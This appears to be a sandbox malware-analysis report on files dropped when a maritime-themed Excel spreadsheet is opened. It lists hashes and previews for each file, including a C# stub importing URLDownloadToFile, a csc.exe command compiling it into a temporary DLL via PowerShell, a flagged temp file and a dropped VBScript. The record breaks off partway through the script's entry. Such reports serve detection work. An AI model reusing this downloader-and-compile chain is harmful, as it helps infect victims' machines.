SHA-512:	3810C4CDE003BAF916D626A41C0534BF421F5CDBF64D897F385FEDA36F556B6FECC27DB294A39F89C82DF0570424DE2EBB789E0B2294D42BFF80A64756257BD6
Malicious:	false
Preview:	....l............................]..WT.. EMF....h...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................2......."...........!...............................................2......."...........!...............................................2......."...........!...............................................2.......'.......................%...........................................................L...d.......L.......!.......L...........!..............?...........?................................L...d...y...Y...........y...Y.......[...!..............?...........?................................'.......................%...................................&...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\883E1738.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7440
Entropy (8bit):	5.6312448977812695
Encrypted:	false
SSDEEP:	96:PV1Ipi7blJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHDx:PVxvTNAK4oOIGbK1RvVwPAWmOHDx
MD5:	DEA1DEA8BEA479821FA2AC1C565B6E56
SHA1:	86865637336A9FEFA98AC5ABD189A848BE8852D4
SHA-256:	64832E2264B5A851EE2CC7E048DA437D6F41B1C3DCAA385971DAA1B502A11125
SHA-512:	1E1858F58748BF88DAB254F524943AC2C8576B4546AA67E37DFFE8917396A1CCCBA3964554AA77C599DD1CA184A56B8AFC3406A14C880A1B88D163EB04BACA1C
Malicious:	false
Preview:	....l........... ...<...........w....... EMF................................8...X....................?..............................@...C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.......d............................Xt....\.............L...7.Xt........].v?.Xt......Xt.......w8.....9............w....$.......d...........*XYt.....XYtH...8....d....9.-...4...6=.w................<.fv.[Sw....X..V..............................Twdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B755764F.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1504468
Entropy (8bit):	1.7693060102813485
Encrypted:	false
SSDEEP:	3072:L+6i9zy7v2/uEB1A/meRlmRYT9FANxg2WUZUKdRLuk0VgHPLk9CVi:LKERludvLuk0Vgk9CVi
MD5:	EF3C18CC49B02153C770DB977B2E7435
SHA1:	D436E0F820DDBBA10DB4D3F1243ED3AA6468C057
SHA-256:	F328FB5B6055B687344190BB13D8DD6CDF6EA76D4AAAE6C5112DEC1B32ACE3C2
SHA-512:	2081EF5EE87A360894B8726494F30DFEEFF7D922E733D2E633A3D010DE56C6A4CAEADEEBE4CD12A28658AE250ADE3B093F2FAB032B92A31D511D9C99A12AF337
Malicious:	false
Preview:	....l...........I...R............:...).. EMF................................8...X....................?...........................................:...)..........J...S...Q...............I...R...................J...S...P...(...x........... ....:...)..(...J...S.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB16081A.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3191264
Entropy (8bit):	2.0118490192617995
Encrypted:	false
SSDEEP:	6144:nA0Ki15RlURvLuky+NkuCVAKERludvLuk0Vgk9CVnOKAOK1:P5RlMHk5ERlyDkr8a
MD5:	04A17584C7203C47419D4AC2163B98C6
SHA1:	485E17A82AE4672AC8D4B542CA0F509B80C0C4DF
SHA-256:	EBA2B7C929B2EAA16FB1F733B7ACDDDFD80635A7211B3FBE400FF2796C17827E
SHA-512:	043092951F27E81FF96DA084E8112107D6F00DAEE83ADA80132BEC696E56309D16FDDED39F7F3810CA58BB6357CC6A75718CDD2F7B4342CF82D0421B7681A88C
Malicious:	false
Preview:	....l...........@................S...".. EMF.....0.....#...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
Category:	dropped
Size (bytes):	485
Entropy (8bit):	3.8401670271262036
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuRVE/0nMGHvQXReKJ8SRHy4HByCnvxr0deKRF/0LsaIy:V/DTLDfuzOXfHlysIxRuMy
MD5:	D24098E842ACDC16D68EB9FC1EB0D97D
SHA1:	A5ED59B81D7A78E4F619850C0D05F05984C282A7
SHA-256:	5A2115BB93ABACD6E4CF9C0FC15F629C527FC13513305FFAE22BA8872DB0E309
SHA-512:	9A387056470CD7B1CADC638CA29227303A6C447EB551D219FBF0FB0E4C4265D9B9D40E3830088BB8EAE3626CEB827DE0CCB827C68B5D6A878AC1D1D17056D9AE
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace HSbfoVpn.{. public class dfB. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dCbpccxuQQm,string IzMm,string ZivdTpV,uint fUyFHsgNe,IntPtr kUOzHcflzy);.. }..}.

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.296294243387615
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fZx0zxs7+AEszIP23fZhBH:p37Lvkmb6KzUWZEoHBH
MD5:	6DA3E2770D266EF3B524AEB1930D4603
SHA1:	734F3A1011652158F8ABA44C08DFC4B840C5995B
SHA-256:	710DA833852EBD42721CC606FD741620FE337B2CE749B79FBF6AF347208C2334
SHA-512:	44DE4F230B3F421F839792EE2ED0E8BE19423661ADE1B7FAA5D134A002CBB0309F54BDDA423FCFD77B0AA0E1E7E259A7D3FE48503FFD07F686D58FF78289597B
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.0.cs"

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.866041409876249
Encrypted:	false
SSDEEP:	24:etGS2mpeYYLPl78cBOkgRp5StkZfz+mFTyAFWI+ycuZhNkakSgPNnq:62lYwPlIC4hJ6Q+91ulka34q
MD5:	5592E584D6452434010867BA1CC5DEE8
SHA1:	A3856D8A19D6F8CC169AA92F6C56A86F4837C595
SHA-256:	24BCFD32452B2245459C9EE9E94ED3CFFB7CECF3D51C8613F6F19366B8DFEE1E
SHA-512:	6630BB2A7D6D8BDCDA975D59686F3359E63E99AFE4A5696D2F5AD877FB0BA12156CA52889FF020872774EBE046C687885D0F84AC7B68BC643C4FC27965A8042A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-...................................................... ;.....P ......M.........S....._.....d.....l.....v...M.....M...!.M.....M.......!............;.......................................$..........<Module>.2e

C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.368236069747642
Encrypted:	false
SSDEEP:	24:AId3ka6Kz1EoHBOKaMD5DqBVKVrdFAMBJTH:Akka601EoHBOKdDcVKdBJj
MD5:	59F0B7BA520DE367CD349DD02178F3A0
SHA1:	5CD6BDCE7BB59D64A0B30884FAFE2E16EA1EC60B
SHA-256:	230E0B1AB33277576FE060089D6814530511DE4ED936E5AF536CEC6FF915D27C
SHA-512:	13985189880D51BF48C6120DE317FC4B50A8C9ABE27E46B3C1824402F84EF723D79CF9AC0E0398C0C0B0777979E65AA72C2A85E0C2CCCF17FB4A8BE37E55346E
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1047026516417717
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry3jGak7YnqqkjXPN5Dlq5J:+RI+ycuZhNkakSgPNnqX
MD5:	20B0FCB1FA6ACF4FD8B6EB4F1690799B
SHA1:	DAB23C8D15A185A1ADB6DE47EADFD9FCBEDC4F1F
SHA-256:	1467541DA5B80704814C1125EA478443A0BA430459F578F95790C24E99ECE1A4
SHA-512:	E8A63688CE96B2DD0C5AE05D5A5EA7CE397A8254A9E68A7B88A1C418FACFF175EFBDCBF155E381114420E610063A792111DD6A06C3B01495250682760CF976DC
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.e.j.d.q.4.g.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.e.j.d.q.4.g.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\2hj44iz0.hsm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\4s3ntpk1.fz4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	24052
Entropy (8bit):	7.652425367216495
Encrypted:	false
SSDEEP:	384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
MD5:	AE24ADB29E22854D176245019B60E937
SHA1:	28E9F74782AA0D138EE52E3191248F827BF27A1D
SHA-256:	5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
SHA-512:	10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
Malicious:	false
Preview:	PK..........!..B.....@.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..W.."o.....U.aAaY...`.5~...3....3(ME3.Dy..\|..W[...hch.y........V.z../E...Q..h..P\..,.w.....[....R...+lb.._..."~.k...5....1....`....t..Qu...{%O6..z._.j.J.Y....`>.......g..S.e.. .-3.. bc(.jy..5P.L?.g..u......{.%b..ZP.N..s........G....s..6....`o.N0.........\|.<FTM.=..k...7.N.4......p..sL(....@....N...,.s......C.Q........?........:.r...=;q.G....`..O...G.O.)..N...A...i.....o.......PK..........!...%S............_rels/.rels ...(.................................

C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\RES6826.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:50:07 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.999662716954299
Encrypted:	false
SSDEEP:	24:H7e9EurQBhWrTdHxHaWwKdNWI+ycuZhNkakSgPNnqSqd:yrAeBRGKd41ulka34qSK
MD5:	9CC38115D481753881990A84B860D3D1
SHA1:	A0031A67995154AE556515C42C228EE02D04583F
SHA-256:	C707B95107CAC8091BECFD99FEB484E8E120EB500AB8BD15828EB5B1EBEB03A2
SHA-512:	C06B2808083599CCFDC940B1FA5C3CD411918E1DDE6D5F7256A4A0FF40F6FF7181A30EEBEC5A0815D9AD19AFD52288FF6BEEB1E77DC476EA00D88F9C7EBFE5C2
Malicious:	false
Preview:	L.....=g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP................ ....j.O..O..y...........4.......C:\Users\user\AppData\Local\Temp\RES6826.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.e.j.d.q.4.g.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\bgrhzi3g.hdl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\e42ly0jz.jlc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\htbay350.5by.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\kw1juh5f.dvh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\qn1vb4c0.vwb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\ug2kumtg.szq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF1E87EF4C543DF07F.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA189BEBEAD81AD87.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	684032
Entropy (8bit):	7.9390976337992765
Encrypted:	false
SSDEEP:	12288:SI9vVc43il1WBftMSVRqfPSMCfhhBKzleY66W6qSzdI7lN5vz9ZiJAuCkV:jtvs1atMURwSNjBKzKKziRNVz9Zxtk
MD5:	DF10FBE006C15516348BD04D2574E5B6
SHA1:	D6740F750BC86FFA6D1258DA1F924078D7B3AE8C
SHA-256:	84344884A9C3993AE3CA8A8C742C89243CD8D921106C6F705812EACF7D3CE2F9
SHA-512:	6AB2C3DA68CCB9BE402F015A7DE8947E4859B33D5C9F0DAE7D178F59267B19D954592A75A171D865E6B32CF3E22981C3485B5A87D57CC0B22610414684622471
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC601DD9C0FBA6613.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	676352
Entropy (8bit):	7.9837213851560795
Encrypted:	false
SSDEEP:	12288:sI9vVc43il1WBftMSVRqfPSMCfhhBKzleY66W6qSzdI7lN5vz9ZiJAuCkV:Ntvs1atMURwSNjBKzKKziRNVz9Zxtk
MD5:	F2B929F40F97C4EDB570CC091F9DF439
SHA1:	B9D95A47E263F100F36CD54C68F4CF5046B49421
SHA-256:	AE3C00F353C95C2DA1CB43E934D8367E5CC84AC8E47C94D9F48545F4747C426C
SHA-512:	5F2B6761B6F4A59DDB5BB45FC5CF98AA68C5028206DF4EC36D6B66676A45C5088E13938E9DD125F70A547A2DC32244FEE3F18B630FFC02B29B9B3A28D6A712BD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.6739662216458647
Encrypted:	false
SSDEEP:	12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
MD5:	C61F99FE7BEE945FC31B62121BE075CD
SHA1:	083BBD0568633FECB8984002EB4FE8FA08E17DD9
SHA-256:	1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
SHA-512:	46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
Malicious:	false
Preview:	....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.\|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	24152
Entropy (8bit):	0.7513521539333206
Encrypted:	false
SSDEEP:	24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
MD5:	8A8D71BED4B5760F2F82C680C2C8CACC
SHA1:	FA589EA7BA858C514079289BCEA3625432110427
SHA-256:	78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
SHA-512:	8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
Malicious:	false
Preview:	...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...\|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...\|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	142098
Entropy (8bit):	3.6737957798783647
Encrypted:	false
SSDEEP:	3072:AFdRjwsHv2A7n6J7V5VmnldvvMnKjggt5pMGwm:SdP2A7nC8nr
MD5:	2A43F3918D91622E9CCAC7889F3E6DC2
